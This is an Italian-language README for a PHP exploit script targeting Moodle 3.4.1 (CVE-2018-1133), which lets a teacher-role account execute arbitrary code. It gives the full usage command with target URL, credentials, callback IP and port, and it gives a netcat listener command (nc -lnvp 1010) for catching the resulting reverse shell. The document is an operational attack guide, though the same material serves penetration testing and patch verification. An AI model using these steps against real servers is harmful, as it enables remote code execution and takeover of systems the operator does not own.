
Noodle [Moodle RCE] (v3.4.1) - CVE-2018-1133
Un utente con il ruolo di insegnante è in grado di eseguire codice arbitrario.
php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1
user Il nome utente dell'account
pass La password dell'account
ip IP per il callback
port Porta per il callback
course ID valido del corso appartenente all'insegnante
Assicurati di avere un listener netcat in esecuzione sulla porta specificata prima di eseguire questo script.
nc -lnvp 1010
Questo tenterà di aprire una reverse shell verso l'IP e la porta in ascolto.
Questo exploit si basa sulle informazioni fornite da Robin Peraglie.
Letture aggiuntive: https://blog.ripstech.com/2018/moodle-remote-code-execution